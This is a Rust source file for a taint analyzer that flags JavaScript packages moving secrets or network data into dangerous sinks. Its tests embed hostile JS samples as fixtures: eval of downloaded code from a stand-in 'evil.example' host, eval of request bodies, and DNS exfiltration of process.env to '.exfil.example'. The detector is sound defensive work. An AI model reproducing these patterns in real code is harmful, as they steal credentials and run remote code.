use std::collections::HashMap;
use std::path::{Path, PathBuf};
use swc_common::{sync::Lrc, FileName, SourceMap};
use swc_common::errors::{emitter::EmitterWriter, Handler};
use swc_ecma_ast::*;
use swc_ecma_parser::{lexer::Lexer, Parser, StringInput, Syntax};
use swc_ecma_visit::Visit;
use crate::error::Result;
use crate::error::Error;
pub(crate) use crate::ir::{EdgeKind, NodeId, NodeKind, TaintGraph};
pub(crate) use crate::labels::LabelSet;
use super::resolve::resolve_require;
mod expressions;
mod labels_default;
mod scope;
mod visitor;
pub use labels_default::default_label_set;
pub(crate) use labels_default::apply_labels;
pub(crate) use scope::Scope;
pub struct JsParser {
pub(super) graph: TaintGraph,
pub(super) current_file: PathBuf,
pub(super) scopes: Vec<Scope>,
pub(super) requires: Vec<(NodeId, String)>,
pub(super) require_calls: Vec<(NodeId, String)>,
pub(super) module_exports: Option<NodeId>,
pub(super) current_function_node: Option<NodeId>,
pub(super) last_fn_params: Option<Vec<NodeId>>,
pub(super) pending_callback_param_sources: Option<Vec<Option<NodeId>>>,
pub(super) event_handlers: Vec<(NodeId, Vec<NodeId>)>,
pub(super) function_params: HashMap<String, Vec<NodeId>>,
pub(super) known_strings: HashMap<String, String>,
pub(super) known_arrays: HashMap<String, Vec<String>>,
pub(super) pending_promise_node: Option<NodeId>,
pub(super) promise_resolvers: Vec<(NodeId, NodeId)>,
pub(super) composite_bindings: HashMap<NodeId, Vec<(String, NodeId)>>,
pub(super) assigned_members: std::collections::HashSet<String>,
pub(super) fn_expr_depth: usize,
pub(super) fn_expr_params_at_depth_0: Option<Vec<NodeId>>,
pub(super) node_to_params: HashMap<NodeId, Vec<NodeId>>,
}
impl JsParser {
pub fn new() -> Self {
Self {
graph: TaintGraph::new(),
current_file: PathBuf::from("."),
scopes: Vec::new(),
requires: Vec::new(),
require_calls: Vec::new(),
module_exports: None,
current_function_node: None,
last_fn_params: None,
pending_callback_param_sources: None,
event_handlers: Vec::new(),
function_params: HashMap::new(),
known_strings: HashMap::new(),
known_arrays: HashMap::new(),
pending_promise_node: None,
promise_resolvers: Vec::new(),
composite_bindings: HashMap::new(),
assigned_members: std::collections::HashSet::new(),
fn_expr_depth: 0,
fn_expr_params_at_depth_0: None,
node_to_params: HashMap::new(),
}
}
pub fn set_current_file(&mut self, path: PathBuf) {
self.current_file = path;
self.scopes.clear();
self.module_exports = None;
}
pub fn clear_file_state(&mut self) {
self.scopes.clear();
self.module_exports = None;
self.known_strings.clear();
self.known_arrays.clear();
self.pending_callback_param_sources = None;
self.pending_promise_node = None;
self.promise_resolvers.clear();
self.requires.clear();
self.require_calls.clear();
self.composite_bindings.clear();
self.assigned_members.clear();
self.fn_expr_depth = 0;
self.fn_expr_params_at_depth_0 = None;
self.node_to_params.clear();
}
pub fn parse_module(&mut self, src: &str) -> Result<()> {
let cm: Lrc<SourceMap> = Default::default();
let writer = EmitterWriter::new(Box::new(std::io::sink()), None, false, false);
let _handler = Handler::with_emitter(true, false, Box::new(writer));
let fm = cm.new_source_file(
FileName::Custom(self.current_file.to_string_lossy().into_owned()).into(),
src.into(),
);
let syntax = if self.current_file.extension().and_then(|s| s.to_str()) == Some("ts") {
Syntax::Typescript(swc_ecma_parser::TsSyntax { tsx: true, ..Default::default() })
} else {
Syntax::Es(swc_ecma_parser::EsSyntax { jsx: true, ..Default::default() })
};
let lexer = Lexer::new(
syntax,
Default::default(),
StringInput::from(&*fm),
None,
);
let mut parser = Parser::new_from(lexer);
let module = parser
.parse_module()
.map_err(|e| Error::Analysis(format!("{:?}", e)))?;
self.visit_module(&module);
Ok(())
}
pub fn into_graph(self) -> TaintGraph {
self.graph
}
pub fn graph_mut(&mut self) -> &mut TaintGraph {
&mut self.graph
}
pub fn take_requires(&mut self) -> Vec<(NodeId, String)> {
std::mem::take(&mut self.requires)
}
pub fn take_require_calls(&mut self) -> Vec<(NodeId, String)> {
std::mem::take(&mut self.require_calls)
}
pub fn module_exports(&self) -> Option<NodeId> {
self.module_exports
}
}
pub fn parse_js_with_labels(
source: &str,
filename: &str,
labels: Option<&LabelSet>,
) -> Result<TaintGraph> {
let mut parser = JsParser::new();
parser.set_current_file(PathBuf::from(filename));
parser.parse_module(source)?;
let mut graph = parser.into_graph();
let label_set = labels.map_or_else(default_label_set, |l| l.clone());
apply_labels(&mut graph, &label_set);
graph.set_label_set(label_set);
Ok(graph)
}
pub fn parse_js(source: &str, filename: &str) -> Result<TaintGraph> {
parse_js_with_labels(source, filename, None)
}
fn collect_js_files(dir: &Path, out: &mut Vec<PathBuf>) -> Result<()> {
if dir.is_dir() {
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
let path = entry.path();
if path.is_file() && path.extension().and_then(|s| s.to_str()) == Some("js") {
out.push(path);
} else if path.is_dir() {
collect_js_files(&path, out)?;
}
}
}
Ok(())
}
pub fn parse_package_with_labels(
dir: &Path,
labels: Option<&LabelSet>,
) -> Result<TaintGraph> {
let mut files = Vec::new();
collect_js_files(dir, &mut files)?;
let mut parser = JsParser::new();
let mut file_exports: HashMap<PathBuf, NodeId> = HashMap::new();
let mut all_requires: Vec<(PathBuf, NodeId, String)> = Vec::new();
let mut all_require_calls: Vec<(PathBuf, NodeId, String)> = Vec::new();
for file in &files {
parser.set_current_file(file.clone());
let source = std::fs::read_to_string(file)
.map_err(|e| Error::Io(e))?;
parser.parse_module(&source)?;
if let Some(exports) = parser.module_exports() {
file_exports.insert(file.clone(), exports);
}
for (node_id, spec) in parser.take_requires() {
all_requires.push((file.clone(), node_id, spec));
}
for (node_id, spec) in parser.take_require_calls() {
all_require_calls.push((file.clone(), node_id, spec));
}
parser.clear_file_state();
}
let package_json_path = dir.join("package.json");
if package_json_path.is_file() {
if let Ok(source) = std::fs::read_to_string(&package_json_path) {
let _ = super::package_json::populate_package_json_graph(&source, &mut parser.graph);
}
}
for (from_file, node_id, spec) in all_requires {
if let Some(resolved) = resolve_require(&from_file, &spec) {
if let Some(&exports) = file_exports.get(&resolved) {
parser.graph_mut().add_edge(node_id, exports, EdgeKind::Call);
}
}
}
for (from_file, node_id, spec) in all_require_calls {
if let Some(resolved) = resolve_require(&from_file, &spec) {
if let Some(&exports) = file_exports.get(&resolved) {
parser.graph_mut().add_edge(exports, node_id, EdgeKind::Assignment);
}
}
}
let mut graph = parser.into_graph();
let label_set = labels.map_or_else(default_label_set, |l| l.clone());
apply_labels(&mut graph, &label_set);
graph.set_label_set(label_set);
Ok(graph)
}
pub fn parse_package(dir: &Path) -> Result<TaintGraph> {
parse_package_with_labels(dir, None)
}
#[cfg(test)]
mod tests {
use super::*;
fn has_findings(js: &str) -> bool {
let graph = parse_js(js, "test.js").unwrap();
!crate::analyze(&graph).unwrap().is_empty()
}
#[test]
fn parse_js_source_to_sink_path() {
let source = "var x = process.env.TOKEN; fetch(x);";
let graph = parse_js(source, "test.js").unwrap();
let has_source = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_source()));
let has_sink = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_sink()));
assert!(has_source, "expected a source node");
assert!(has_sink, "expected a sink node");
}
#[test]
fn parse_js_require_express_no_taint() {
let source = "const express = require('express');";
let graph = parse_js(source, "test.js").unwrap();
let has_source = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_source()));
let has_sink = graph.nodes().iter().any(|n| n.label.map_or(false, |l| l.is_sink()));
assert!(!has_source, "express should not create a source");
assert!(!has_sink, "express should not create a sink");
}
#[test]
fn parse_package_links_require() {
let dir = tempfile::tempdir().unwrap();
let index = dir.path().join("index.js");
let helper = dir.path().join("helper.js");
std::fs::write(&index, "const h = require('./helper'); h.run();").unwrap();
std::fs::write(&helper, "exports.run = function() { fetch('x'); };").unwrap();
let graph = parse_package(dir.path()).unwrap();
let require_nodes: Vec<_> = graph.nodes().iter()
.filter(|n| n.kind == NodeKind::Import && n.name.contains("require"))
.collect();
assert!(!require_nodes.is_empty(), "expected a require import node");
}
#[test]
fn debug_getcookies_60() {
let js = r#"
var http = require('http');
http.createServer(function(req, res) {
var body = '';
req.on('data', function(chunk) { body += chunk; });
req.on('end', function() {
var json = JSON.parse(body);
eval(json.code);
});
}).listen(8080);
"#;
let graph = parse_js(js, "debug.js").unwrap();
for n in graph.nodes() {
eprintln!("Node {}: {} {:?} {:?}", n.id, n.name, n.kind, n.label);
}
for id in 0..graph.node_count() as u32 {
for neighbor in graph.neighbors(id) {
eprintln!("Edge: {} -> {}", id, neighbor);
}
}
let findings = crate::analyze(&graph).unwrap();
eprintln!("Findings: {:?}", findings);
assert!(!findings.is_empty());
}
#[test]
fn optional_call_propagates_taint() {
assert!(has_findings("eval?.(process.env.TOKEN);"));
}
#[test]
fn network_response_listener_chunk_is_tainted() {
let js = r#"
const https = require('https');
https.get('https://evil.example/payload', function(res) {
res.on('data', function(chunk) {
eval(chunk);
});
});
"#;
assert!(has_findings(js));
}
#[test]
fn array_callback_param_receives_element_taint() {
let js = r#"
const arr = [process.env.TOKEN];
const mapped = arr.map(function(value) {
return value.trim();
});
eval(mapped.join(''));
"#;
assert!(has_findings(js));
}
#[test]
fn destructuring_uses_precise_property_taint() {
let js = r#"
const src = { safe: 'ok', secret: process.env.TOKEN };
const { safe } = src;
fetch(safe);
"#;
assert!(!has_findings(js));
}
#[test]
fn ternary_test_does_not_taint_result() {
let js = r#"
const cond = process.env.TOKEN;
const value = cond ? 'safe-left' : 'safe-right';
fetch(value);
"#;
assert!(!has_findings(js));
}
#[test]
fn proxy_get_handler_receives_target_taint_inline() {
let js = r#"
new Proxy(process.env, {
get(target, prop) {
fetch(target[prop]);
return target[prop];
}
});
"#;
assert!(has_findings(js));
}
#[test]
fn proxy_get_handler_receives_target_taint_variable() {
let js = r#"
const handler = {
get(target, prop) {
fetch(target[prop]);
return target[prop];
}
};
new Proxy(process.env, handler);
"#;
assert!(has_findings(js));
}
#[test]
fn promise_then_named_callback_wired() {
let js = r#"
const handler = (res) => fetch(res);
Promise.resolve(process.env.TOKEN).then(handler);
"#;
assert!(has_findings(js));
}
#[test]
fn member_expr_read_snapshot_not_conflated_with_write() {
let js = r#"
const obj = { x: 1 };
const original = obj.x;
obj.x = 2;
fetch(original);
"#;
let graph = parse_js(js, "test.js").unwrap();
let obj_x_nodes: Vec<_> = graph.nodes().iter().filter(|n| n.name == "obj.x").collect();
assert!(obj_x_nodes.len() >= 2, "expected snapshot node separate from location node");
}
}
#[cfg(test)]
mod debug_tests2 {
use super::*;
use crate::analyze;
#[test]
fn debug_apt_bb_builder() {
let js = r#"
var e = JSON.stringify(process.env);
process.nextTick(function() {
require('dns').lookup(e.slice(0, 60) + '.exfil.example', function() {});
});
"#;
let graph = parse_js(js, "test.js").unwrap();
eprintln!("Nodes:");
for node in graph.nodes() {
eprintln!(" id={} kind={:?} name={:?} label={:?}", node.id, node.kind, node.name, node.label);
}
let findings = analyze(&graph).unwrap();
eprintln!("Findings: {}", findings.len());
}
}